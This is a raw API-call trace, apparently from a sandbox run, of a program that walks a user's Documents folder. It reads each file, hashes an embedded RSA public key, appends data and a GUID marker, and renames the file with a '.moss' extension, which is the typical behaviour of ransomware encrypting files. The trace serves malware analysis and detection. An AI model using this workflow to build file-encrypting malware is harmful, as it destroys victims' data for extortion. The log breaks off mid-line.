[0170.347] CloseHandle (hObject=0x664) returned 1 [0170.348] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360ef10 [0170.348] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8c0) returned 0x3b4b098 [0170.348] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\4Dln-6B2CH3Hg4kDacAD.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\4dln-6b2ch3hg4kdacad.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\4Dln-6B2CH3Hg4kDacAD.ods.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\4dln-6b2ch3hg4kdacad.ods.moss")) returned 1 [0170.350] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc160130, ftCreationTime.dwHighDateTime=0x1d5dec7, ftLastAccessTime.dwLowDateTime=0xa39ecb60, ftLastAccessTime.dwHighDateTime=0x1d5e00c, ftLastWriteTime.dwLowDateTime=0xa39ecb60, ftLastWriteTime.dwHighDateTime=0x1d5e00c, nFileSizeHigh=0x0, nFileSizeLow=0xa7a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GhDa.ppt", cAlternateFileName="")) returned 1 [0170.350] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.350] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0170.350] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\GhDa.ppt") returned=".ppt" [0170.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\GhDa.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\ghda.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.351] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=42919) returned 1 [0170.351] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.355] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa781, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.355] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.356] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xa7a7, lpOverlapped=0x0) returned 1 [0170.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.357] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.357] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.357] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.358] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.358] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.358] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.358] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.358] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.358] GetLastError () returned 0x0 [0170.358] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.358] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.358] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.358] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.359] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.359] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.359] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.359] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b5e660 [0170.360] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa7a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.360] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.360] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.360] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.360] CloseHandle (hObject=0x664) returned 1 [0170.362] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.362] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.362] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\GhDa.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\ghda.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\GhDa.ppt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\ghda.ppt.moss")) returned 1 [0170.364] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e9c560, ftCreationTime.dwHighDateTime=0x1d5e148, ftLastAccessTime.dwLowDateTime=0x6fdd2420, ftLastAccessTime.dwHighDateTime=0x1d5e237, ftLastWriteTime.dwLowDateTime=0x6fdd2420, ftLastWriteTime.dwHighDateTime=0x1d5e237, nFileSizeHigh=0x0, nFileSizeLow=0x160e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qd9fmjYwbt.pdf", cAlternateFileName="QD9FMJ~1.PDF")) returned 1 [0170.364] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.364] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0170.364] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\qd9fmjYwbt.pdf") returned=".pdf" [0170.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\qd9fmjYwbt.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\qd9fmjywbt.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.364] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=90343) returned 1 [0170.364] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.368] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x160c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.368] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.369] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.369] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x160e7, lpOverlapped=0x0) returned 1 [0170.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.372] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.373] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.373] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.373] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.373] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.373] GetLastError () returned 0x0 [0170.373] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.373] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.373] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.373] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.374] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.374] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.375] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x160e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.375] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.375] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.375] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.376] CloseHandle (hObject=0x664) returned 1 [0170.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0170.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.378] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\qd9fmjYwbt.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\qd9fmjywbt.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\qd9fmjYwbt.pdf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\qd9fmjywbt.pdf.moss")) returned 1 [0170.380] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42daaf40, ftCreationTime.dwHighDateTime=0x1d5e21b, ftLastAccessTime.dwLowDateTime=0x3839eae0, ftLastAccessTime.dwHighDateTime=0x1d5dc28, ftLastWriteTime.dwLowDateTime=0x3839eae0, ftLastWriteTime.dwHighDateTime=0x1d5dc28, nFileSizeHigh=0x0, nFileSizeLow=0x18d25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wha9_.rtf", cAlternateFileName="")) returned 1 [0170.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0170.380] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Wha9_.rtf") returned=".rtf" [0170.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Wha9_.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\wha9_.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.380] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=101669) returned 1 [0170.380] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.384] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18cff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.384] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.386] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.386] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x18d25, lpOverlapped=0x0) returned 1 [0170.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.387] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.387] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.389] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.389] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.389] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.389] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.389] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.389] GetLastError () returned 0x0 [0170.389] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.389] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.389] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.389] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.389] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.389] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.390] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.390] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b7ba78 [0170.391] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18d25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.391] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.391] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.391] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.391] CloseHandle (hObject=0x664) returned 1 [0170.393] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.394] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.394] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Wha9_.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\wha9_.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Wha9_.rtf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\wha9_.rtf.moss")) returned 1 [0170.396] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe327b4f0, ftCreationTime.dwHighDateTime=0x1d5d8b8, ftLastAccessTime.dwLowDateTime=0xe2d6bcf0, ftLastAccessTime.dwHighDateTime=0x1d5dd25, ftLastWriteTime.dwLowDateTime=0xe2d6bcf0, ftLastWriteTime.dwHighDateTime=0x1d5dd25, nFileSizeHigh=0x0, nFileSizeLow=0x160c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z91WTiE9.odt", cAlternateFileName="")) returned 1 [0170.396] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.396] 